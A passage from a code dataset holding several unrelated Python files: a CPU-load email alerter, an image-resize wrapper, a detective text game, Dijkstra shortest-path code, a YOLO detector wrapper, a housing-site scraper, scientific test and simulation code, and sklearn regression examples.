sys.exit(app.exec_())\n","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":3436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"283899793","text":"def check_loadavg():\n\t#get load average\n\twith open(\"/proc/loadavg\",\"r\") as handle:\n\t\tloadavg = handle.read().split()\n\t#get number of CPU's\n\twith open(\"/proc/cpuinfo\",\"r\") as handle:\n\t\tcpuinfo = [x for x in handle.readlines() if \"processor\" in x]\n\n\t#figure out if CPU usage is too high or not\n\tfor x in range(1,3):\n\t\tif float(loadavg[x]) < (len(cpuinfo) * 0.925):\n\t\t\treturn None\n\t\telif float(loadavg[x]) > (len(cpuinfo) * 0.925):\n\t\t\tif x == 2:\n\t\t\t\treturn \"CPU usage has been High for Too long check ASAP!!!\"\n\t\t\telse:\n\t\t\t\treturn \"CPU usage is a little high, might be worth having a check\"\n\n#send an email if CPU usage is too high\nstatus = check_loadavg()\nif status != None:\n\tmsgbody = status\n\timport smtplib\n\tfrom email.mime.text import MIMEText\n\n\tmsg = MIMEText(msgbody)\n\tmsg['Subject'] = \"CPU Usage Alert!!\"\n\tmsg['From'] = 'servername'\n\tmsg['To'] = 'alert@address.com'\n\n\ts = smtplib.SMTP('smtp.gmail.com','')\n\ts.starttls()\n\ts.login(\"usernamehere@gmail.com\",\"password\")\n\ts.sendmail(me, [you], msg.as_string())\n\ts.quit()\n","sub_path":"loadavg-alert.py","file_name":"loadavg-alert.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"474579919","text":"import os\n\ndef main():\n\n directory = input(\"Choose directory of images you'd like to scale: \")\n image_size = input(\"Choose the new image size you'd like: \")\n\n cmd = 'ImageResizer/ImageResizer/bin/ImageResizer' + ' ' + directory + ' ' + str(image_size)\n os.system(cmd)\n\n print('All done!')\n\nif __name__== \"__main__\":\n main()\n\n","sub_path":"resize_images.py","file_name":"resize_images.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"211721740","text":"import random\nimport pprint\nimport time\nimport sys\n\nSUSPECTS = ['DUKE HAUTDOG', 'MAXIMUM POWERS', 'BILL MONOPOLIS', 'SENATOR SCHMEAR', 'MRS. FEATHERTOSS',\n 'DR. JEAN SPLICER', 'RAFFLES THE CLOWN', 'ESPRESSA TOFFEEPOT', 'CECIL EDGAR VANDERTON']\nITEMS = ['FLASHLIGHT', 'CANDLESTICK', 'RAINBOW FLAG', 'HAMSTER WHEEL', 'ANIME VHS TAPE',\n 'JAR OF PICKLES', 'ONE COWBOY BOOT', 'CLEAN UNDERPANTS', '5 DOLLAR GIFT CARD']\nPLACES = ['ZOO', 'OLD BARN', 'DUCK POND', 'CITY HALL', 'HIPSTER CAFE',\n 'BOWLING ALLEY', 'VIDEO GAME MUSEUM', 'UNIVERSITY LIBRARY', 'ALBINO ALLIGATOR PIT']\nTIME_TO_SOLVE = 300 # Seconds\n\nPLACE_FIRST_LETTERS = {}\nLONGEST_PLACE_NAME_LENGTH = 0\nfor place in PLACES:\n PLACE_FIRST_LETTERS[place[0]] = place\n LONGEST_PLACE_NAME_LENGTH = len(place) if len(\n place) > LONGEST_PLACE_NAME_LENGTH else LONGEST_PLACE_NAME_LENGTH\n\nassert len(SUSPECTS) == 9\nassert len(ITEMS) == 9\nassert len(PLACES) == 9\nassert len(PLACE_FIRST_LETTERS.keys()) == len(PLACES)\n\nknownSuspectsAndItems = []\nvisitedPlaces = {}\ncurrentLocation = 'TAXI'\naccusedSuspects = []\nliars = random.sample(SUSPECTS, random.randint(3, 4))\naccusationsLeft = 3\nculprit = random.choice(SUSPECTS)\n\nrandom.shuffle(SUSPECTS)\nrandom.shuffle(ITEMS)\nrandom.shuffle(PLACES)\n\nclues = {}\nfor idx, interviewee in enumerate(SUSPECTS):\n if interviewee in liars:\n continue\n\n clues[interviewee] = {}\n clues[interviewee]['debug_liar'] = False\n for item in ITEMS:\n clues[interviewee][item] = PLACES[ITEMS.index(item)] if random.randint(\n 0, 1) else SUSPECTS[ITEMS.index(item)]\n for suspect in SUSPECTS:\n clues[interviewee][suspect] = PLACES[SUSPECTS.index(\n suspect)] if random.randint(0, 1) else ITEMS[SUSPECTS.index(suspect)]\n\nfor i, interviewee in enumerate(SUSPECTS):\n if interviewee not in liars:\n continue\n\n clues[interviewee] = {}\n clues[interviewee]['debug_liar'] = True\n\n for item in ITEMS:\n if random.randint(0, 1):\n while True:\n clues[interviewee][item] = random.choice(PLACES)\n if clues[interviewee][item] != PLACES[ITEMS.index(item)]:\n break\n else:\n while True:\n clues[interviewee][item] = random.choice(SUSPECTS)\n if clues[interviewee][item] != SUSPECTS[ITEMS.index(item)]:\n break\n\n for suspect in SUSPECTS:\n if random.randint(0, 1):\n while True:\n clues[interviewee][suspect] = random.choice(PLACES)\n if clues[interviewee][suspect] != PLACES[SUSPECTS.index(suspect)]:\n break\n else:\n while True:\n clues[interviewee][item] = random.choice(ITEMS)\n if clues[interviewee][item] != ITEMS[SUSPECTS.index(suspect)]:\n break\n\nzophieClues = {}\nfor interviewee in random.sample(SUSPECTS, random.randint(3, 4)):\n kindOfClue = random.randint(1, 3)\n if kindOfClue == 1:\n if interviewee not in liars:\n zophieClues[interviewee] = culprit\n elif interviewee in liars:\n while True:\n zophieClues[interviewee] = random.choice(SUSPECTS)\n if zophieClues[interviewee] != culprit:\n break\n\n elif kindOfClue == 2:\n if interviewee not in liars:\n zophieClues[interviewee] = PLACES[SUSPECTS.index(culprit)]\n elif interviewee in liars:\n while True:\n zophieClues[interviewee] = random.choice(PLACES)\n if zophieClues[interviewee] != PLACES[SUSPECTS.index(culprit)]:\n break\n\n elif kindOfClue == 3:\n if interviewee not in liars:\n zophieClues[interviewee] = ITEMS[SUSPECTS.index(culprit)]\n elif interviewee in liars:\n while True:\n zophieClues[interviewee] = random.choice(ITEMS)\n if zophieClues[interviewee] != ITEMS[SUSPECTS.index(culprit)]:\n break\n\n# pprint.pprint(clues)\n# pprint.pprint(zophieClues)\n# print(f'culprit = {culprit}')\n\nprint(\"\"\"J'ACCUSE! (a mystery game)\nInspired by Homestar Runner\\'s \"Where\\'s an Egg?\" game\n\nYou are the world-famous detective Mathilde Camus.\nZOPHIE THE CAT has gone missing, and you must sift through the clues.\nSuspects either always tell lies, or always tell the truth. Ask them\nabout other people, places, and items to see if the details they give are\ntruthful and consistent with your observations. Then you will know if\ntheir clue about ZOPHIE THE CAT is true or not. Will you find ZOPHIE THE\nCAT in time and accuse the guilty party?\n\"\"\")\ninput('Press Enter to begin...')\n\nstartTime = time.time()\nendTime = startTime + TIME_TO_SOLVE\n\nwhile True:\n if time.time() > endTime or accusationsLeft == 0:\n if accusationsLeft == 0:\n print('You have accused too manny innocent people!')\n elif time.time() > endTime:\n print('You have run out of time!')\n culpritIdx = SUSPECTS.index(culprit)\n print(\n f'It was {culprit}at the {PLACES[culpritIdx]} with the {ITEMS[culpritIdx]} who catnapped her!')\n print('Better luck next time, Detective.')\n sys.exit()\n\n print()\n minutesLeft = int(endTime - time.time()) // 60\n secondsLeft = int(endTime - time.time()) % 60\n print(f'Time left: {minutesLeft} min, {secondsLeft} sec')\n\n if currentLocation == 'TAXI':\n print(' You are in your TAXI. Where do you want to go?')\n for place in sorted(PLACES):\n placeInfo = visitedPlaces[place] if place in visitedPlaces else ''\n nameLabel = '(' + place[0] + ')' + place[1:]\n spacing = \" \" * (LONGEST_PLACE_NAME_LENGTH - len(place))\n print(f'{nameLabel} {spacing}{placeInfo}')\n print('(Q)UIT GAME')\n while True:\n response = input('> ').upper()\n if response == '':\n continue\n if response == 'Q':\n print('Thanks for playing!')\n sys.exit()\n if response in PLACE_FIRST_LETTERS.keys():\n break\n currentLocation = PLACE_FIRST_LETTERS[response]\n continue\n\n print(f' You are at the {currentLocation}.')\n currentLocationIdx = PLACES.index(currentLocation)\n personHere = SUSPECTS[currentLocationIdx]\n itemHere = ITEMS[currentLocationIdx]\n print(f' {personHere} with the {itemHere} is here.')\n\n if personHere not in knownSuspectsAndItems:\n knownSuspectsAndItems.append(personHere)\n if ITEMS[currentLocationIdx] not in knownSuspectsAndItems:\n knownSuspectsAndItems.append(ITEMS[currentLocationIdx])\n if currentLocation not in visitedPlaces.keys():\n visitedPlaces[currentLocation] = f'({personHere.lower()}, {itemHere.lower()})'\n\n if personHere in accusedSuspects:\n print('They are offended that you accused them, and will not help you with your investigation.')\n print('You go back to your TAXI.')\n print()\n input('Press Enter to continue...')\n currentLocation = 'TAXI'\n continue\n\n print()\n print(f'(J) \"J\\'ACCUSE!\" ({accusationsLeft} accusations left)')\n print('(Z) Ask if they know where ZOPHIE THE CAT is.')\n print('(T) Go back to the TAXI.')\n for idx, suspectOrItem in enumerate(knownSuspectsAndItems):\n print(f'({idx+1}) Ask about {suspectOrItem}')\n\n while True:\n response = input('> ').upper()\n if response in 'JZT' or (response.isdecimal() and eval(f'0 < {response} <= {len(knownSuspectsAndItems)}')):\n break\n\n if response == 'J':\n accusationsLeft -= 1\n if personHere == culprit:\n print('You\\' ve cracked the case, Detective!')\n print(f'It was {culprit} who had catnapped ZOPHIE THE CAT.')\n minutesTaken = int(time.time() - startTime) // 60\n secondsTaken = int(time.time() - startTime) % 60\n print(\n f'Good job! You solved it in {minutesTaken} min, {secondsTaken} sec.')\n sys.exit()\n else:\n accusedSuspects.append(personHere)\n print('You have accused the wrong person, Detective!')\n print('They will not help you with anymore clues.')\n print('You go back to your TAXI.')\n currentLocation = 'TAXI'\n\n elif response == 'Z':\n if personHere not in zophieClues:\n print('\"I don\\'t know anything about ZOPHIE THE CAT.')\n elif personHere in zophieClues:\n print(f' They give you this clue: \"{zophieClues[personHere]}\"')\n if zophieClues[personHere] not in knownSuspectsAndItems and zophieClues[personHere] not in PLACES:\n knownSuspectsAndItems.append(zophieClues[personHere])\n\n elif response == 'T':\n currentLocation = 'TAXI'\n continue\n\n else:\n inquiry = knownSuspectsAndItems[int(response) - 1]\n if inquiry in (personHere, itemHere):\n print(' They give you this clue: \"No comment.\"')\n else:\n print(f' They give you this clue: \"{clues[personHere][inquiry]}\"')\n if clues[personHere][inquiry] not in knownSuspectsAndItems and clues[personHere][inquiry] not in PLACES:\n knownSuspectsAndItems.append(clues[personHere][inquiry])\n\n input('Press Enter to continue...')\n","sub_path":"Chapter_38_Jaccuse/Jaccuse.py","file_name":"Jaccuse.py","file_ext":"py","file_size_in_byte":9378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"415035658","text":"# find shortest paths from a \"source\" node to all other nodes in a weighted directed graph,\n# producing a shortest-path tree (a subset of edges of original tree).\n# Also apply to undirected graph which is just a directed graph with bidirectional connections.\n# BFS is actaully Dijkstra for unweighted graph (all weights are 1).\n\n# https://medium.com/basecs/finding-the-shortest-path-with-a-little-help-from-dijkstra-613149fbdc8e\n\nimport heapq\n\nclass Solution(object):\n # If graph nodes are labelled by a number, we can use list for best distance. List uses less space than dict.\n def dijkstra_listForDist(self, edges, N):\n graph = [{} for _ in range(N)]\n for u, v, w in edges:\n graph[u][v] = w\n\n dist = [float('inf')] * N\n dist[0] = 0\n\n pq = [(0, 0)] # minHeap of (dist, node) dist is the key for ordering.\n while pq:\n d, node = heapq.heappop(pq)\n # If dest is given, can return here because this is guaranteed the min distance to dest\n # if node == dest: return d\n\n # filter out duplicate path to a node. Each node is only visited once which path has min distance.\n # Note shouldn't skip for d==dist[node], because the path w/ same dist may not visited yet.\n if d > dist[node]: continue\n\n for nei, weight in graph[node].items():\n # d2 is the total distance to reach 'nei' (neighbor) node.\n d2 = d + weight\n if d2 < dist[nei]:\n heapq.heappush(pq, (d2, nei)) # smaller dist goes to front\n dist[nei] = d2\n\n print(dist)\n return\n\n # Very useful for graph where nodes are not labelled by a number. Refer to LC864 shortest-path-to-get-all-keys.py\n def dijkstra_dictForDist(self, edges, N):\n graph = [{} for _ in range(N)]\n for u, v, w in edges:\n graph[u][v] = w\n\n dist = {}\n\n pq = [(0, 0)] # minHeap of (dist, node) dist is the key for ordering.\n while pq:\n d, node = heapq.heappop(pq)\n # If dest is given, can return here because this is guaranteed the min distance to dest\n # if node == dest: return d\n\n # filter out duplicate path to a node. Each node is only visited once which path has min distance.\n if node in dist: continue\n dist[node] = d\n\n for nei, weight in graph[node].items():\n if nei not in dist:\n heapq.heappush(pq, (d + weight, nei)) # smaller dist goes to front\n\n print(dist)\n return\n\nSolution().dijkstra2_DG([(0,1,4), (0,2,2), (1,2,3), (1,3,2), (1,4,3), (2,1,1), (2,3,4), (2,4,5), (4,3,1)], 5)\n# dict implementation: {0: 0, 2: 2, 1: 3, 3: 5, 4: 6}\n# list implementation: [0,3,2,5,6]\n'''\nresult: dist = [0,3,2,5,6]\n 0\n / \\\n 1 = 2\n | X |\n 3 - 4\n'''\n\n","sub_path":"Python/dijkstra.py","file_name":"dijkstra.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"639921383","text":"from pseudosign import *\nfrom optparse import OptionParser\n\nparser=OptionParser()\nparser.add_option(\"-d\", \"--data\", dest=\"data\", help=\"to be signed data\", metavar=\"DATA\")\nparser.add_option(\"-p\", \"--privatekey\", dest=\"privKey\", help=\"private key\", metavar=\"PRIV\")\nparser.add_option(\"-c\", \"--certificate\", dest=\"certificate\", help=\"certificate to use\", metavar=\"CERT\")\n(options,args)=parser.parse_args()\n\n(R, s, digest,cert_dgst) = PseudonymSign(options.data, options.privKey, options.certificate)\nprint(R.output(compress=True, Ieee1609Dot2=True))\nprint (Hex(s, radix_256))\nprint(cert_dgst[-16:])\n","sub_path":"sign_explicit.py","file_name":"sign_explicit.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"346187139","text":"# -*- coding: utf-8 -*\n\nimport os\nimport string\nfrom PIL import Image\nimport json\nimport sys\nimport tempfile\n\nclass test_detector:\n @classmethod\n def readcmd(cls, cmd):\n try:\n ftmp = tempfile.NamedTemporaryFile(suffix='.out', prefix='tmp', delete=False)\n fpath = ftmp.name\n if os.name==\"nt\":\n fpath = fpath.replace(\"/\",\"\\\\\") # forwin\n ftmp.close()\n os.system(cmd + \" > \" + fpath)\n data = \"\"\n with open(fpath, 'r') as file:\n data = file.read()\n file.close()\n os.remove(fpath)\n return data\n except:\n print(sys.exc_info()[0])\n\n def __init__(self):\n pass\n\n\n @classmethod\n def test(cls, img, path, graph, session):\n try:\n #path = os.path.abspath(os.getcwd())\n #print(path)\n img.save(os.path.abspath(os.getcwd()) + '/original.' + img.format.lower())\n modelname = ''\n for filename in os.listdir(path):\n if filename.endswith('.weights'):\n modelname = os.path.splitext(filename)[0]\n fin = open(path + 'obj.data', 'rt')\n data = fin.read()\n data = data.replace('/mnt/2c67bd82-3031-40f8-8f53-58564ba23509/Graphics/yolo/test/', path).replace('cfg/' + modelname,'')\n fin.close()\n fin = open(path + 'obj.data', 'wt')\n fin.write(data)\n fin.close()\n resultstr = cls.readcmd('./darknet detector test ' + path + '\"obj.data\" ' + path + '\"yolov4.cfg\" ' + path + modelname + '\".weights\" \"original.' + img.format.lower() + '\" -gpus 0 -ext_output 2>&1 | tee -a ./temp.log')\n #print('\\n\\n\\n\\n\\n\\n\\n')\n #print(resultstr.split('\\n'))\n resultarr = resultstr.split('\\n')\n returnarr = []\n for str in resultarr:\n if str.startswith('[[') and str.endswith(']]'):\n #print(str + '\\n')\n tmparr = str.replace('[[','').replace(']]','').split(' ')\n tmpval = {\n 'class':tmparr[4],\n 'classResult':[{'score': tmparr[5],'boundingBox':[tmparr[0], tmparr[1], tmparr[2], tmparr[3]]}]\n }\n for obj in returnarr:\n if obj['class'] == tmparr[4]:\n obj['classResult'].append({'score':tmparr[5],'boundingBox':[tmparr[0], tmparr[1], tmparr[2], tmparr[3]]})\n else:\n returnarr.append(tmpval)\n if len(returnarr) == 0:\n returnarr.append(tmpval)\n returnval = {\n 'isSuccess':'true',\n 'ErrorMsg':'',\n 'result':returnarr\n }\n return json.dumps(returnval)\n except:\n returnval = {\n 'isSuccess': 'false',\n 'ErrorMsg': sys.exc_info()[0],\n }\n return json.dumps(returnval)\n\n","sub_path":"test_detector.py","file_name":"test_detector.py","file_ext":"py","file_size_in_byte":3101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"410130463","text":"# -*- coding: utf-8 -*-\n\n\nimport unittest\nimport numpy\n#import h5py\n\n\n\"\"\"\n*******************************************************************************\n\n\n Tests of the quantarhei.qm.corfunctions.cfmatrix module\n\n\n*******************************************************************************\n\"\"\"\n\n\nimport quantarhei as qr\nimport quantarhei.qm.corfunctions as cors\n\nclass TestCFMatrix(unittest.TestCase):\n \"\"\"Tests of matrix of corelation functions module\n \n \n \"\"\"\n \n def setUp(self, verbose=False):\n \"\"\"Initializes the calculation\n \n \"\"\"\n \n self.verbose = verbose\n \n self.time = qr.TimeAxis(0, 1000, 1.0)\n self.temperature = 300\n pars1 = dict(ftype=\"OverdampedBrownian\", reorg=30, cortime=100,\n T=self.temperature)\n pars2 = dict(ftype=\"OverdampedBrownian\", reorg=80, cortime=200,\n T=self.temperature)\n\n self.cf1 = qr.CorrelationFunction(self.time, pars1)\n self.cf2 = qr.CorrelationFunction(self.time, pars2)\n\n \n def test_of_creation(self):\n \"\"\"(CorrelationFunctionMatrix) Test of creation \n \n \"\"\"\n cfm = cors.CorrelationFunctionMatrix(self.time, nob=5)\n \n cfm.set_correlation_function(self.cf1, [(1,1),(2,2),(3,3)])\n cfm.set_correlation_function(self.cf2, [(4,4)])\n \n \n def test_of_temperature_retrieval(self):\n \"\"\"(CorrelationFunctionMatrix) Test of temperature retrieval \n \"\"\"\n cfm = cors.CorrelationFunctionMatrix(self.time, nob=5)\n \n cfm.set_correlation_function(self.cf1, [(1,1),(2,2),(3,3)])\n cfm.set_correlation_function(self.cf2, [(4,4)])\n \n T = cfm.get_temperature()\n \n numpy.testing.assert_almost_equal(T, self.temperature)\n\n \n\n","sub_path":"tests/unit/qm/corfunctions/cfmatrix_test.py","file_name":"cfmatrix_test.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"613790334","text":"#########################################################\n# File Name: crawlingSSH.py\n# Author: Z.Z\n# Email: zhzhang2015@sina.com\n# Start Time: Thu 04 Jan 2018 05:36:37 PM CET\n#########################################################\n#\n#!/usr/bin/python3\n#-*- coding: utf-8 -*-\n# 说来也奇怪,以前也试过这样,但是不成功,不知道今天咋就成功了,太神奇了。估计得等明天在试试,万一不行了呢,毕竟我的浏览器本地还有很多Cookies,虽然不知道是不是这个原因,还是等等看吧。\nimport json\nimport logging \nfrom requests import Session\n\ntrue = True\nresponseResultFile = \"response.json\"\n\nlogging.basicConfig(level = logging.INFO)\nlogger = logging.getLogger(\"REQUESTS\")\n\nbaseUrl = \"https://aanbod.sshxl.nl/ons-huuraanbod\"\nxhrUrl = 'https://aanbod.sshxl.nl/usercontrols/kim/aanbod/ikwilhuren.asmx/GetAanbodData'\n\nlogger.info(\" Start to set up session with \"+baseUrl)\ns = Session()\ns.get(baseUrl)\n\nlogger.info(\" Setting up payload and request headers\")\npayload = json.dumps({\"aanbodtypes\":[],\"filters\":[],\"filtersoorten\":[\"Aggregatie\",\"HuurtoeslagMogelijk\",\"Type\"],\"skipFirstFilter\":true})\nrequestHeader = {'Accept':'application/json, text/javascript, */*; q=0.01',\n 'Accept-Encoding':'gzip, deflate, br',\n 'Accept-Language':'zh-CN,zh;q=0.8',\n 'Connection':'keep-alive',\n 'Content-Length':'',\n 'Content-Type':'application/json; charset=UTF-8',\n #'Cookie':'BataviaWonen.Session=o1tm5k2dbkpgjphfdkcgqlkd; Language=en-US; __atuvc=18%7C52%2C27%7C1; __atuvs=5a4e471d4b1514da000; _ga=GA1.2.695652008.1514296068; _gid=GA1.2.2144178308.1514815281; _gat=1; __AntiForgeryToken=xskxx0owd5Ls6/SCkOiy5KZ5GU3uNxxnITprVs0EQWJE6+FLmEvq+OxT7W7teUPFnM2yhVNAhz8QkPEH2WEA7B8N56jjjL6ekkMz7SrtdF4=; huuraanbodsettings-%2Fons-huuraanbod=%7B%22filters%22%3A%5B%5D%2C%22aanbodtypes%22%3A%5B%5D%2C%22sorting%22%3A%7B%22field%22%3A%22Naam%22%2C%22reverse%22%3Afalse%2C%22istext%22%3Atrue%7D%2C%22template%22%3A%22templateLijst%22%7D',\n 'Host':'aanbod.sshxl.nl',\n 'Origin':'https://aanbod.sshxl.nl',\n 'Referer':'https://aanbod.sshxl.nl/',\n 'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36',\n 'X-Requested-With':'XMLHttpRequest'\n }\ns.headers.update(requestHeader)\n\nlogger.info(\" Post data to xhr dealer.\")\nr = s.post(xhrUrl, data = payload)\ntry:\n logger.info(\" Fetch data from the xhr dealer\")\n responseText = r.text\nexcept:\n logger.error(\" Failed at POST.\")\n raise\n\nlogger.info(\" Dump data to file: \" + responseResultFile)\ndata = json.loads(responseText)\nwith open(responseResultFile, 'w') as f:\n f.writelines(json.dumps(data, indent=4))\n\n","sub_path":"spiders/crawlingSSH.py","file_name":"crawlingSSH.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"623505501","text":"\n\nfrom xai.brain.wordbase.nouns._instalment import _INSTALMENT\n\n#calss header\nclass _INSTALMENTS(_INSTALMENT, ):\n\tdef __init__(self,): \n\t\t_INSTALMENT.__init__(self)\n\t\tself.name = \"INSTALMENTS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"instalment\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_instalments.py","file_name":"_instalments.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"605874010","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 11 13:13:07 2017\n\n@author: zhangye\n\"\"\"\n\nimport numpy as np\nfrom sklearn.datasets import load_boston\nboston = load_boston()\n#从sklearn的数据库中读取boston房价的数据\nfrom sklearn.cross_validation import train_test_split\nX_train,X_test,y_train,y_test = train_test_split(boston.data, boston.target, test_size = 0.25, random_state = 33)\n#按照75-25的比例将数据分为训练组和测试组\nfrom sklearn.preprocessing import StandardScaler\nss_X = StandardScaler()\nss_y = StandardScaler()\n\nX_train = ss_X.fit_transform(X_train)\nX_test = ss_X.transform(X_test)\ny_train = ss_y.fit_transform(y_train)\ny_test = ss_y.transform(y_test)\n#对数据进行标准化处理\n\nfrom sklearn.ensemble import RandomForestRegressor, ExtraTreesRegressor, GradientBoostingRegressor\n#导入随机森林回归器,极端森林回归器,梯度下降回归器\nrfr = RandomForestRegressor()\nrfr.fit(X_train,y_train)\nrfr_y_predict = rfr.predict(X_test)\n\netr = ExtraTreesRegressor()\netr.fit(X_train, y_train)\netr_y_predict = etr.predict(X_test)\n\ngbr = GradientBoostingRegressor()\ngbr.fit(X_train,y_train)\ngbr_y_predict = gbr.predict(X_test)","sub_path":"chapter_two/code45.py","file_name":"code45.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"15344717","text":"import os\nimport sys\nimport matplotlib.gridspec as gridspec\nimport numpy as np\n\nimport astropy.io.fits as pyfits\nimport matplotlib.pyplot as plt\n\nimport logging\n\nfrom astropy.visualization import simple_norm\nfrom scipy.special import gammaincinv\nfrom astropy.table import Table\nimport sncosmo\nimport astropy.units as u\nimport timeit\nfrom scipy.optimize import minimize\n\nimport psf_mog_fitting as pmf\n\n\ndef gridcreate(name, y, x, ratio, z, **kwargs):\n # Function that creates a blank axis canvas; each figure gets a name (or alternatively a number\n # if none is given), and gridspec creates an N*M grid onto which you can create axes for plots.\n # This returns a gridspec \"instance\" so you can specific which figure to put the axis on if you\n # have several on the go.\n plt.figure(name, figsize=(z*x, z*ratio*y))\n gs = gridspec.GridSpec(y, x, **kwargs)\n return gs\n\n\ndef model_number(run_minutes, n_runs):\n # assuming a static time for each run; dominated by fit, not creation currently\n n_filt_choice = 0\n n = 7 # including R, eventually\n for k in np.arange(2, n+1):\n n_filt_choice += np.math.factorial(n) / np.math.factorial(k) / np.math.factorial(n - k)\n # cadence can vary from, say, 5 days to 25 days (5 days being the minimum needed, and 25 days\n # giving 2 data points per lightcurve), so cadence could be varied in 5s initially, and thus\n cadence_interval = 5\n cadences = np.arange(5, 25+1e-10, cadence_interval)\n n_cadence = len(cadences)\n\n n_tot = n_filt_choice * n_cadence\n\n time = n_tot * run_minutes * n_runs\n\n print(\"{} choices, {} runs, {:.0f}/{:.0f}/{:.0f} approximate minutes/hours/days\".format(n_tot, n_runs, time, time/60, time/60/24))\n\n\ndef gaussian_2d(x, x_t, mu, mu_t, sigma):\n det_sig = np.linalg.det(sigma)\n p = np.matmul(x_t - mu_t, np.linalg.inv(sigma))\n # if we don't take the 0, 0 slice we accidentally propagate to shape (len, len, len, len) by\n # having (len, len, 1, 1) shape passed through\n mal_dist_sq = np.matmul(p, (x - mu))[:, :, 0, 0]\n gauss_pdf = np.exp(-0.5 * mal_dist_sq) / (2 * np.pi * np.sqrt(det_sig))\n return gauss_pdf\n\n\n# flat and dark can be loaded from the stips fits file or found elsewhere, they are simply input\n# files to be multipled/added to the original data.\ndef add_dark(image, d):\n # choice returns a random choice from np.arange(a) if just given a single integer a\n x_i, y_j = (np.random.choice(d.shape[i]-image.shape[i]) for i in [0, 1])\n image += d[x_i:x_i + image.shape[0], y_j:y_j + image.shape[1]]\n return image\n\n\ndef mult_flat(image, d):\n # choice returns a random choice from np.arange(a) if just given a single integer a\n x_i, y_j = (np.random.choice(d.shape[i]-image.shape[i]) for i in [0, 1])\n image *= d[x_i:x_i + image.shape[0], y_j:y_j + image.shape[1]]\n return image\n\n\n# read noise is just a constant single read value\ndef add_read(image, readnoise):\n image += readnoise\n return image\n\n\ndef set_exptime(image, exptime):\n image *= exptime\n return image\n\n\ndef add_background(image, bkg):\n image += bkg\n return image\n\n\n# if lambda is a numpy array then size is ignored and each value is used creating a new array of\n# the original shape. we could instead, for large lambda, generate a gaussian of mean 0 and\n# variance lambda; this is the more general formula allowing for low counts, however.\ndef add_poisson(image):\n return np.random.poisson(lam=image).astype(float)\n\n\ndef mog_galaxy(pixel_scale, filt_zp, psf_c, gal_params):\n mu_0, n_type, e_disk, pa_disk, half_l_r, offset_r, Vgm_unit, cms, vms, mag, offset_ra_pix, \\\n offset_dec_pix = gal_params\n\n cm_exp = np.array([0.00077, 0.01077, 0.07313, 0.37188, 1.39727, 3.56054, 4.74340, 1.78732])\n vm_exp_sqrt = np.array([0.02393, 0.06490, 0.13580, 0.25096, 0.42942, 0.69672, 1.08879,\n 1.67294])\n cm_dev = np.array([0.00139, 0.00941, 0.04441, 0.16162, 0.48121, 1.20357, 2.54182, 4.46441,\n 6.22821, 6.15393])\n vm_dev_sqrt = np.array([0.00087, 0.00296, 0.00792, 0.01902, 0.04289, 0.09351, 0.20168, 0.44126,\n 1.01833, 2.74555])\n\n # this requires re-normalising as Hogg & Lang (2013) created profiles with unit intensity at\n # their half-light radius, with total flux for the given profile simply being the sum of the\n # MoG coefficients, cm, so we ensure that sum(cm) = 1 for normalisation purposes\n cms = cm_dev / np.sum(cm_dev) if n_type == 4 else cm_exp / np.sum(cm_exp)\n # Vm is always circular so this doesn't need to be a full matrix, but PSF m/V do need to\n vms = np.array(vm_dev_sqrt)**2 if n_type == 4 else np.array(vm_exp_sqrt)**2\n\n mks = psf_c[:, [0, 1]].reshape(-1, 2, 1)\n pks = psf_c[:, 5] # what is referred to as 'c' in psf_mog_fitting is p_k in H&L13\n sx, sy, r = psf_c[:, 2], psf_c[:, 3], psf_c[:, 4]\n Vks = np.array([[[sx[q]**2, r[q]*sx[q]*sy[q]], [r[q]*sx[q]*sy[q], sy[q]**2]] for\n q in range(0, len(sx))])\n # covariance matrix and mean positions given in pixels, but need converting to half-light\n mks *= (pixel_scale / half_l_r)\n Vks *= (pixel_scale / half_l_r)**2\n\n len_image = np.ceil(2.2*offset_r / pixel_scale).astype(int)\n len_image = len_image + 1 if len_image % 2 == 0 else len_image\n len_image = max(25, len_image)\n image = np.zeros((len_image, len_image), float)\n x_cent, y_cent = (image.shape[0]-1)/2, (image.shape[1]-1)/2\n\n # positons should be in dimensionless but physical coordinates in terms of Re; first the\n # Xg vector needs converting from its given (ra, dec) to pixel coordiantes, to be placed\n # in the xy grid correctly (currently this just defaults to the central pixel, but it may\n # not in the future)\n xg = np.array([[(offset_ra_pix + x_cent) * pixel_scale / half_l_r],\n [(offset_dec_pix + y_cent) * pixel_scale / half_l_r]])\n x_pos = (np.arange(0, image.shape[0])) * pixel_scale / half_l_r\n y_pos = (np.arange(0, image.shape[1])) * pixel_scale / half_l_r\n x, y = np.meshgrid(x_pos, y_pos, indexing='xy')\n # n-D gaussians have mahalnobis distance (x - mu)^T Sigma^-1 (x - mu) so coords_t and m_t\n # should be *row* vectors, and thus be shape (1, x) while coords and m should be column\n # vectors and shape (x, 1). starting with coords, we need to add the grid of data, so if\n # this array has shape (1, 2, y, x), and if we transpose it it'll have shape 